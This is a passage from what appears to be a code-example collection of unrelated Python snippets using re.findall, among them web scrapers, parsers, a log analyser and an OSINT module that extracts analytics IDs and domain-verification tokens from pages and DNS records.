        media_urls.extend(re.findall(r'var\s+filePath\s*=\s*"([^"]+)"', webpage))
        media_urls.extend(re.findall(r'\'file\'\s*:\s*["\']([^"\']+)["\'],', webpage))

        formats = [
            {
                'url': media_url,
                'quality': quality(determine_ext(media_url))
            } for media_url in set(media_urls)
        ]

        self._sort_formats(formats)

        return {
            'id': video_id,
            'title': title,
            'thumbnail': self._html_search_regex(r'\'image\'\s*:\s*["\']([^"\']+)["\']', webpage, 'thumbnail'),
            'formats': formats,
            'description': description,
        }
Example #25
 def evalAtom(self, atom, param_names):
     if atom in self.consts:
         return '(const _%s)'%atom
     elif atom in param_names:
         return '(param (paramref \"%s\"))'%atom
     elif re.match(r'^\d+$', atom):
         return '(const (intc %s))'%atom
     elif atom.lower() in ['true', 'false']:
         return '(const (boolc %s))'%atom.lower()
     elif re.match(r'^forall.*end$', atom) or re.match(r'^exists.*?end$', atom):
         if re.match(r'^forall.*end$', atom):
             params, text = re.findall(r'forall(.*?)do(.*)end', atom)[0]
         else:
             params, text = re.findall(r'exists(.*?)do(.*)end', atom)[0]
         param_name_dict, param_defs = analyzeParams(params)
         for p in param_names:
             if p not in param_name_dict: param_name_dict[p] = 0
         text = self.splitText(text)
         sub_form = self.evaluate(self.process(text), param_name_dict)
         if re.match(r'^forall.*?end$', atom):
             return '(forallFormula %s %s)'%(param_defs, sub_form)
         else:
             return '(existFormula %s %s)'%(param_defs, sub_form)
     else:
         return '(var %s)'%self.evalVar(atom)
Example #26
def __get_dom_elements(item, name, attrs):
    if not attrs:
        pattern = '(<%s(?:\s[^>]*>|/?>))' % (name)
        this_list = re.findall(pattern, item, re.M | re.S | re.I)
    else:
        last_list = None
        for key, value in attrs.iteritems():
            value_is_regex = isinstance(value, re_type)
            value_is_str = isinstance(value, basestring)
            pattern = '''(<{tag}[^>]*\s{key}=(?P<delim>['"])(.*?)(?P=delim)[^>]*>)'''.format(tag=name, key=key)
            re_list = re.findall(pattern, item, re.M | re.S | re.I)
            if value_is_regex:
                this_list = [r[0] for r in re_list if re.match(value, r[2])]
            else:
                temp_value = [value] if value_is_str else value
                this_list = [r[0] for r in re_list if set(temp_value) <= set(r[2].split(' '))]
                
            if not this_list:
                has_space = (value_is_regex and ' ' in value.pattern) or (value_is_str and ' ' in value)
                if not has_space:
                    pattern = '''(<{tag}[^>]*\s{key}=((?:[^\s>]|/>)*)[^>]*>)'''.format(tag=name, key=key)
                    re_list = re.findall(pattern, item, re.M | re.S | re.I)
                    if value_is_regex:
                        this_list = [r[0] for r in re_list if re.match(value, r[1])]
                    else:
                        this_list = [r[0] for r in re_list if value == r[1]]
    
            if last_list is None:
                last_list = this_list
            else:
                last_list = [item for item in this_list if item in last_list]
        this_list = last_list
    
    return this_list
Example #27
	def showCovers_adddetail_csfd(self, data, title):
		title_s = re.findall('<title>(.*?)\|', data, re.S)
		if title_s:
			if title_s[0] != "Vyhled\xc3\xa1v\xc3\xa1n\xc3\xad ":
				csfd_title = title_s[0]
			else:
				csfd_title = title
			print "EMC csfd: Movie name - %s" % csfd_title
		else:
			csfd_title = title
		bild = re.findall('<img src="(//img.csfd.cz/files/images/film/posters/.*?|//img.csfd.cz/posters/.*?)" alt="poster"', data, re.DOTALL | re.IGNORECASE)
		if bild:
			print "EMC csfd: Cover Select - %s" % title
			self.cover_count = self.cover_count + 1
			csfd_url = "http:" + bild[0].replace('\\','').strip()
			self.menulist.append(showCoverlist(csfd_title, csfd_url, self.o_path, "csfd: "))
			self["info"].setText((_("found") + " %s " + _("covers")) % (self.cover_count))
			bild = re.findall('<h3>Plak.*?ty</h3>(.*?)</table>', data, re.S)
			if bild:
				bild1 = re.findall('style=\"background-image\: url\(\'(.*?)\'\)\;', bild[0], re.DOTALL | re.IGNORECASE)
				if bild1:
					for each in bild1:
						print "EMC csfd: Cover Select - %s" % title
						self.cover_count = self.cover_count + 1
						csfd_url = "http:" + each.replace('\\','').strip()
						self.menulist.append(showCoverlist(csfd_title, csfd_url, self.o_path, "csfd: "))
						self["info"].setText((_("found") + " %s " + _("covers")) % (self.cover_count))
				else:
					print "EMC csfd 3 : no else covers - %s" % title
			else:
				print "EMC csfd 2 : no else covers - %s" % title
		else:
			print "EMC csfd 1 : keine infos gefunden - %s" % title
Example #28
def ReadProtonCounts(inchi):
    import re

    #Get inchi layers
    layers = inchi.split('/')
    ProtLayer = ''
    FixedLayer = ''
    for l in layers[1:]:
        if 'C' in l and 'H' in l:
            atoms = re.findall(r"[a-zA-Z]+", l)
            indexes = [int(x) for x in re.findall(r"\d+", l)]
            formula = [list(x) for x in zip(atoms, indexes)]
        if 'h' in l and ProtLayer != '':
            FixedLayer = l[1:]
        if 'h' in l and ProtLayer == '':
            ProtLayer = l[1:]

    #initialize proton list
    nheavy = sum([x[1] for x in formula if x[0] != 'H'])

    #Find, save and remove tautomeric portions from main proton layer
    tautomerics = re.findall(r"\(.*?\)", ProtLayer)
    ProtLayer = re.sub(r"\(.*?\)", "", ProtLayer)
    if ProtLayer[-1] == ',':
        ProtLayer = ProtLayer[:-1]

    #Read the main and the fixed proton layer
    protons = ReadPSections(ProtLayer, nheavy)
    fprotons = ReadPSections(FixedLayer, nheavy)

    return protons, formula, tautomerics, fprotons
Example #29
    def getCssLinks(self):
        """获取css文件中的链接(一般主要有图片和其他css文件)"""
        f = open(self.file)
        css = f.read()
        f.close()

        def getNewLink(cl):
            up = urlparse(self.url)
            if (not up.path) or ('../' not in cl):
                return cl

            cs = cl.count('../')+1
            newlink = up.scheme+'://'+up.netloc+'/'.join(up.path.split('/')[:-cs])
            newlink = re.sub(r'(\.\./)+', newlink+'/', cl)
            return newlink

        # image links
        picLinks = re.findall(r'background:\s*url\s*\([\'\"]?([a-zA-Z0-9/\._-]+)[\'\"]?\)', css, re.I)
        # other CSS links
        cssLinks = re.findall(r'@import\s*[\'\"]*([a-zA-Z0-9/\._-]+)[\'\"]*', css, re.I)
        Links = picLinks + cssLinks
        cLinks = []
        for cl in Links:
            cLinks.append(getNewLink(cl))

        return cLinks
Example #30
def parse_log(log_file):
    with open(log_file, 'r') as log_file2:
        log = log_file2.read()

    loss_pattern = r"Iteration (?P<iter_num>\d+), loss = (?P<loss_val>[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?)"
    losses = []
    loss_iterations = []

    fileName= os.path.basename(log_file)
    for r in re.findall(loss_pattern, log):
        loss_iterations.append(int(r[0]))
        losses.append(float(r[1]))

    loss_iterations = np.array(loss_iterations)
    losses = np.array(losses)

    accuracy_pattern = r"Iteration (?P<iter_num>\d+), Testing net \(#0\)\n.* accuracy = (?P<accuracy>[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?)"
    accuracies = []
    accuracy_iterations = []
    accuracies_iteration_checkpoints_ind = []

    for r in re.findall(accuracy_pattern, log):
        iteration = int(r[0])
        accuracy = float(r[1]) * 100

        if iteration % 10000 == 0 and iteration > 0:
            accuracies_iteration_checkpoints_ind.append(len(accuracy_iterations))

        accuracy_iterations.append(iteration)
        accuracies.append(accuracy)

    accuracy_iterations = np.array(accuracy_iterations)
    accuracies = np.array(accuracies)
	
    return loss_iterations, losses, accuracy_iterations, accuracies, accuracies_iteration_checkpoints_ind, fileName
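A hypothetical call; the regexes above match Caffe-style training logs, and the file name is illustrative:

# loss_iters, losses, acc_iters, accs, ckpt_idx, name = parse_log('caffe_train.log')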
Example #31
def camel_case_match(string):
    """
    Properly matches the camelCase naming style so that a name like
    writeXMLDocument gets parsed as ["write", "XML", "Document"].
    """
    return re.findall('(^[a-z]+|[A-Z][a-z]+|[A-Z]+|[0-9])(?![a-z])', string)
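One more quick check of the pattern, alongside the docstring's example:

# camel_case_match('parseHTTP2Frames')  ->  ['parse', 'HTTP', '2', 'Frames']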
Example #32
def parse_google_link(url):
    return url  # now it seems to be ok
    # The lines below are unreachable; they are the original Google-redirect unwrapping logic.
    real = re.findall('http[^&]*&', url)[0]
    ret = urllib.unquote(real[:-1])
    return ret
Example #33
def getImageList(html):
    reg = 'http[^"]*?\.jpg'
    imgre = re.compile(reg)
    imgList = re.findall(imgre,html)
    return imgList
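A quick illustration with a hypothetical HTML snippet:

# getImageList('<img src="http://example.com/a.jpg"><img src="http://example.com/b.jpg">')
#   ->  ['http://example.com/a.jpg', 'http://example.com/b.jpg']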
Example #34
def get_number_from_string(string):
    return [float(s) for s in re.findall(r"[-+]?\d*\.\d+|\d+", string)]
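For example:

# get_number_from_string('12 apples, -3.5 degrees, v2.0')  ->  [12.0, -3.5, 2.0]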
Example #35
# Python for Informatics, Chapter 11, example 6 (page 132, section 11.2)
# Prints out all possible email addresses from a file
# (Anything that is string@string)
import re

hand = open('mbox-short.txt')
for line in hand:
    line = line.rstrip()
    x = re.findall('\S+@\S+', line)
    if len(x) > 0:
        print x
Example #36
    def getArticleDetails(self, articles):
        print("Get Article Details...")
        artdic = {}
        # Define Webdriver
        driver = webdriver.Remote(
            command_executor='http://selenium-hub:4444/wd/hub',
            desired_capabilities=getattr(DesiredCapabilities, "FIREFOX"))
        RemoteConnection.set_timeout(36000)
        url = articles
        driver.get(url)

        # Get source code from page
        htmltext = driver.page_source
        soup = BeautifulSoup(htmltext, "lxml")
        driver.quit()
        # Extract field values and parse them to json / dictionary
        tempdic = {}
        try:
            tempdic['Article_ID'] = soup.find(
                "meta", attrs={"name": "parsely-post-id"})["content"]
        except:
            tempdic['Article_ID'] = "0"
        tempdic['URL'] = url
        tempdic['Title'] = soup.title.string
        tempdic['Author'] = soup.find("meta", attrs={"name":
                                                     "author"})["content"]

        # Loop to extract clean date
        tempdic['PublishingDate'] = \
            re.findall(r".+?(?=T)", soup.find("meta", property="article:published_time")["content"])[0]

        # Loop to extract no of responses and reading_time
        tempdic['Reading_time'] = re.findall(
            r"[0-9]",
            soup.find("meta", attrs={"name": "twitter:data1"})["value"])[0]
        try:
            tempdic['No_Responses'] = re.findall(
                r"[0-9]",
                soup.find("span", "az").string)[0]
        except:
            tempdic['No_Responses'] = 0

        # Loop to extract tags
        li = soup.select("ul > li > a")
        tags = []
        for link in li:
            tags.append(link.string)
        tempdic['Tags'] = tags

        # Loop to extract claps
        btns = soup.find_all("button")
        for button in btns:
            if button.string is None:
                pass
            else:
                try:
                    tempdic['Claps'] = (int(button.string))
                except:
                    break

        # Loop to get clean text
        pagetext = ""
        text = soup.findAll("p")
        for t in text:
            pagetext += t.getText()
        # Clean special characters
        pagetext = (" ".join(re.findall(r"[A-Za-z0-9]*",
                                        pagetext))).replace("  ", " ")
        tempdic['Text'] = pagetext
        artdic[url] = tempdic
        return (artdic)
Example #37
def words(text): return re.findall('[a-z]+', text.lower()) 

DICTIONARY = set(words(file(config.SPELLCHECKER_TEXT).read()))
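A quick check of the tokenizer (config.SPELLCHECKER_TEXT is whatever corpus the project configures):

# words("Don't panic -- it's fine!")  ->  ['don', 't', 'panic', 'it', 's', 'fine']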
Example #38
import re, operator


def update_location(tile, match):
    if match == 'e': direction = (2, 0)
    if match == 'se': direction = (1, -1)
    if match == 'sw': direction = (-1, -1)
    if match == 'w': direction = (-2, 0)
    if match == 'nw': direction = (-1, 1)
    if match == 'ne': direction = (1, 1)
    return tuple(map(operator.add, tile, direction))
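# Worked example of the doubled coordinates above: following 'nwwswee' visits
# (-1, 1) -> (-3, 1) -> (-4, 0) -> (-2, 0) -> (0, 0), i.e. back to the start tile.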


flipped = set()

tiles = [line for line in open('input.txt').read().strip().split('\n')]
for tile in tiles:
    loc = (0, 0)
    matches = re.findall(r'(e|se|sw|w|nw|ne)', tile)
    for match in matches:
        loc = update_location(loc, match)
    if loc not in flipped:
        flipped.add(loc)
    else:
        flipped.remove(loc)
print(len(flipped))
Example #39
import csv
import re

import serial  # third-party: pyserial

x_val = 0
y_ch1 = 0
y_ch2 = 0

fieldnames = ["x_val", "y_ch1", "y_ch2"]

ser = serial.Serial()
ser.baudrate = 9600
ser.port = 'COM3'
ser.open()
print("Is open:", ser.is_open)

with open('data.csv', 'w') as csv_file:
    csv_writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
    csv_writer.writeheader()

while True:
    with open('data.csv', 'a') as csv_file:
        csv_writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
        channel1 = ser.readline()
        channel2 = ser.readline()
        res_ch1 = re.findall(r'\d+', str(channel1))
        res_ch2 = re.findall(r'\d+', str(channel2))
        y_ch1 = int(res_ch1[1])
        y_ch2 = int(res_ch2[1])
        print(int(res_ch1[0]), int(res_ch1[1]))
        print(int(res_ch2[0]), int(res_ch2[1]))
        info = {"x_val": x_val, "y_ch1": y_ch1, "y_ch2": y_ch2}
        csv_writer.writerow(info)
        x_val += 1
Example #40
 def get_md5_file_name(file_path):
     file_name = os.path.basename(file_path)
     return re.findall(r"([a-fA-F\d]{32})", file_name)[0]
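# e.g. get_md5_file_name('/tmp/d41d8cd98f00b204e9800998ecf8427e.bin')  (hypothetical path)
#   ->  'd41d8cd98f00b204e9800998ecf8427e'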
def toCamelCase(line):
  return re.findall(r'[A-Z](?:[a-z]+|[A-Z]*(?=[A-Z]|$))', line)
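# Note: despite its name, toCamelCase splits an already CamelCased identifier into words:
# toCamelCase('HelloWorldFTW')  ->  ['Hello', 'World', 'FTW']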
def process_text(doc_id, text):
  global tokens_count
  global title_file
  tokens = []
  links = []
  info_box = []
  body = []
  categories = []
  references = []

  #Convert to lower text
  text = text.lower()
  css = re.compile(r'{\|(.*?)\|}',re.DOTALL)
  cite = re.compile(r'{{v?cite(.*?)}}',re.DOTALL)
  files = re.compile(r'\[\[file:(.*?)\]\]',re.DOTALL)
  urls = re.compile(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+',re.DOTALL)
  # junk = re.compile(r"[~`!@#$%-^*+{\[}\]\|\\<>/?]",re.DOTALL)

  # Categories
  catRegExp = r'\[\[category:(.*?)\]\]'
  categories = re.findall(catRegExp,text,flags=re.MULTILINE)
  categories = ' '.join(categories)
  #categories = junk.sub(' ',categories)
  # categories = categories.split()
  tokenList = re.split(r'[^A-Za-z0-9]+', categories)

  for word in tokenList:
    if(len(word)>1):
      add_to_invereted_index(word, doc_id, "c")


  # Infobox
  infoRegExp = r'{{infobox(.*?)}}'
  info_box = re.findall(infoRegExp,text,re.DOTALL)
  for infoList in info_box:
    tokenList = []
    tokenList = re.findall(r'=(.*?)\|',infoList,re.DOTALL)
    tokenList = ' '.join(tokenList)
    #tokenList = junk.sub(' ',tokenList)
    # tokenList = tokenList.split()
    tokenList = re.split(r'[^A-Za-z0-9]+', tokenList)
    
    for word in tokenList:
      if(len(word)>1):
        add_to_invereted_index(word, doc_id, "i")

  # References
  refRegExp = r'== ?references ?==(.*?)=='
  references = re.findall(refRegExp,text,flags=re.DOTALL)

  references = ' '.join(references)
  # print(references)
  #references = junk.sub(' ',references)
  # references = references.split()
  words = re.split(r'[^A-Za-z0-9]+', references)

  for word in words:
    if(len(word)>1):
      add_to_invereted_index(word, doc_id, "r")
      
  # External Links
  ei=0
  ci=len(text)
  try:
    ei = text.index('=external links=')+20
    ci = text.index('[[category:')+20
  except:
    pass

  links = text[ei:ci]
  links = re.findall(r'\[(.*?)\]',text,flags=re.MULTILINE)

  links = ' '.join(links)
  # print(references)
  #links = junk.sub(' ',links)
  # links = links.split()
  words = re.split(r'[^A-Za-z0-9]+', links)

  for word in words:
    if(len(word)>1):
      add_to_invereted_index(word, doc_id, "e")


  text = urls.sub('',text)
  text = cite.sub('',text)
  text = files.sub('',text)
  text = css.sub('',text)
  # text = junk.sub(' ',text)
  # text = remove_punctuation(text)
  words = re.split(r'[^A-Za-z0-9]+', text)
  tokens_count += len(words)
  title_file.write(str(len(words))+"\n")
  # words = text.split() 
  for word in words:
    if(len(word)>1 and len(word) < 46):
      add_to_invereted_index(word, doc_id, "b")
    def handleEvent(self, event):
        eventName = event.eventType
        srcModuleName = event.module
        eventData = event.data
        sourceData = self.sf.hashstring(eventData)

        if sourceData in self.results:
            self.sf.debug(f"Skipping {eventData}, already checked.")
            return None

        self.results[sourceData] = True

        self.sf.debug(f"Received event, {eventName}, from {srcModuleName}")

        if event.moduleDataSource:
            datasource = event.moduleDataSource
        else:
            datasource = "Unknown"

        if eventName == 'TARGET_WEB_CONTENT':
            # Google Analytics
            matches = re.findall(r"\bua\-\d{4,10}\-\d{1,4}\b", eventData, re.IGNORECASE)
            for m in matches:
                if m.lower().startswith('ua-000000-'):
                    continue
                if m.lower().startswith('ua-123456-'):
                    continue
                if m.lower().startswith('ua-12345678'):
                    continue

                self.sf.debug("Google Analytics match: " + m)
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Google Analytics: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Google AdSense
            matches = re.findall(r"\b(pub-\d{10,20})\b", eventData, re.IGNORECASE)
            for m in matches:
                if m.lower().startswith('pub-12345678'):
                    continue

                self.sf.debug("Google AdSense match: " + m)
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Google AdSense: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Google Website Verification
            # https://developers.google.com/site-verification/v1/getting_started
            matches = re.findall(r'<meta name="google-site-verification" content="([a-z0-9\-\+_=]{43,44})"', eventData, re.IGNORECASE)
            for m in matches:
                self.sf.debug("Google Site Verification match: " + m)
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Google Site Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            matches = re.findall(r'<meta name="verify-v1" content="([a-z0-9\-\+_=]{43,44})"', eventData, re.IGNORECASE)
            for m in matches:
                self.sf.debug("Google Site Verification match: " + m)
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Google Site Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Quantcast
            if '_qevents.push' in eventData:
                matches = re.findall(r"\bqacct:\"(p-[a-z0-9]+)\"", eventData, re.IGNORECASE)
                for m in matches:
                    self.sf.debug("Quantcast match: " + m)
                    evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                          "Quantcast: " + m,
                                          self.__name__, event)
                    evt.moduleDataSource = datasource
                    self.notifyListeners(evt)

            # Ahrefs Site Verification
            matches = re.findall(r'<meta name="ahrefs-site-verification" content="([a-f0-9]{64})"', eventData, re.IGNORECASE)
            for m in matches:
                self.sf.debug("Ahrefs Site Verification match: " + m)
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Ahrefs Site Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

        if eventName == 'DNS_TEXT':
            # Google Website Verification
            # https://developers.google.com/site-verification/v1/getting_started
            matches = re.findall(r'google-site-verification=([a-z0-9\-\+_=]{43,44})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Google Site Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # LogMeIn Domain Verification
            # https://support.logmeininc.com/openvoice/help/adding-a-txt-record-to-a-dns-server-ov710011
            matches = re.findall(r'logmein-domain-confirmation ([A-Z0-9]{24})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "LogMeIn Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            matches = re.findall(r'logmein-verification-code=([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "LogMeIn Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # DocuSign Domain Verification
            # https://support.docusign.com/en/guides/org-admin-guide-domains
            matches = re.findall(r'docusign=([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "DocuSign Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # GlobalSign Site Verification
            # https://support.globalsign.com/customer/en/portal/articles/2167245-performing-domain-verification---dns-txt-record
            matches = re.findall(r'globalsign-domain-verification=([a-z0-9\-\+_=]{42,44})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "GlobalSign Site Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Atlassian Domain Verification
            # https://confluence.atlassian.com/cloud/verify-a-domain-for-your-organization-873871234.html
            matches = re.findall(r'atlassian-domain-verification=([a-z0-9\-\+\/_=]{64})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Atlassian Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Adobe IDP Site Verification
            # https://helpx.adobe.com/au/enterprise/using/verify-domain-ownership.html
            matches = re.findall(r'adobe-idp-site-verification=([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Adobe IDP Site Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            matches = re.findall(r'adobe-idp-site-verification=([a-f0-9]{64})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Adobe IDP Site Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Adobe Domain Verification
            # https://helpx.adobe.com/sign/help/domain_claiming.html
            matches = re.findall(r'adobe-sign-verification=([a-f0-9]{32})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Adobe Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Stripe Domain Verification
            # https://stripe.com/docs/apple-pay/web#going-live
            matches = re.findall(r'stripe-verification=([a-f0-9]{64})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Stripe Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)


            # TeamViewer SSO Verification
            # https://community.teamviewer.com/t5/Knowledge-Base/Single-Sign-On-SSO/ta-p/30784
            matches = re.findall(r'teamviewer-sso-verification=([a-f0-9]{32})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "TeamViewer SSO Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Aliyun Site Verification
            matches = re.findall(r'aliyun-site-verification=([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Aliyun Site Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Facebook Domain Verification
            # https://developers.facebook.com/docs/sharing/domain-verification/
            matches = re.findall(r'facebook-domain-verification=([a-z0-9]{30})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Facebook Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Citrix Domain Verification
            matches = re.findall(r'citrix-verification-code=([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Citrix Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Dropbox Domain Verification
            # https://help.dropbox.com/teams-admins/admin/domain-insights-account-capture#verify
            matches = re.findall(r'dropbox-domain-verification=([a-z0-9]{12})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Dropbox Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Detectify Domain Verification
            # https://support.detectify.com/customer/en/portal/articles/2836806-verification-with-dns-txt-
            matches = re.findall(r'detectify-verification=([a-f0-9]{32})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Detectify Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Drift Domain Verification
            matches = re.findall(r'drift-verification=([a-f0-9]{64})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Drift Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Ahrefs Site Verification
            # https://help.ahrefs.com/en/articles/1431155-how-do-i-finish-crawling-my-website-faster-in-site-audit
            matches = re.findall(r'ahrefs-site-verification_([a-f0-9]{64})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Ahrefs Site Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Statuspage.io Domain Verification
            # https://help.statuspage.io/help/domain-ownership
            matches = re.findall(r'status-page-domain-verification=([a-z0-9]{12})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Statuspage Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Zoom.us Domain Verification
            # https://support.zoom.us/hc/en-us/articles/203395207-What-is-Managed-Domain-
            matches = re.findall(r'ZOOM_verify_([a-z0-9\-\+\/_=]{22})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Zoom.us Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Mail.ru Domain Verification
            matches = re.findall(r'mailru-verification: ([a-z0-9]{16})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Mail.ru Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Yandex Domain Verification
            matches = re.findall(r'yandex-verification: ([a-z0-9]{16})$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Yandex Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Brave Ledger Verification
            # https://support.brave.com/hc/en-us/articles/360021408352-How-do-I-verify-my-channel-
            matches = re.findall(r'brave-ledger-verification=([a-z0-9]+)$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Brave Ledger Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # have-i-been-pwned Verification
            matches = re.findall(r'have-i-been-pwned-verification=([a-f0-9]+)$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "have-i-been-pwned Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

            # Cisco Live Domain Verification
            # https://www.ciscolive.com/c/dam/r/ciscolive/us/docs/2016/pdf/TECCOL-2982.pdf
            matches = re.findall(r'cisco-ci-domain-verification=([a-f0-9]+)$', eventData.strip(), re.IGNORECASE)
            for m in matches:
                evt = SpiderFootEvent("WEB_ANALYTICS_ID",
                                      "Cisco Live Domain Verification: " + m,
                                      self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

        return None
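A minimal, self-contained sketch of how one of the DNS TXT patterns above behaves on its own; the record and its 43-character token below are made up purely for illustration, and only the regex comes from the handler.

import re

# hypothetical TXT record with an invented token
sample_txt = 'google-site-verification=1a2b3c4d5e6f7g8h9i0j1k2l3m4n5o6p7q8r9s0t1u2'
for m in re.findall(r'google-site-verification=([a-z0-9\-\+_=]{43,44})$',
                    sample_txt.strip(), re.IGNORECASE):
    print('Google Site Verification token:', m)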
Beispiel #44
0
 def __parse_metadata_field(data: str) -> Dict[str, str]:
     metadata = {}
     for (_, key, value) in re.findall(r"<(xmp|pdfx|pdf|xmpMM):(.+)>(.+)</\1:\2>", data, re.I):
         metadata[key] = value
     return metadata
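A quick, hypothetical illustration of the backreferences in the pattern above: \1 and \2 force the closing tag to repeat the namespace and key of the opening tag. The XMP fragment below is invented for the example.

import re

sample = '<xmp:CreatorTool>LaTeX</xmp:CreatorTool>'  # made-up XMP fragment
metadata = {}
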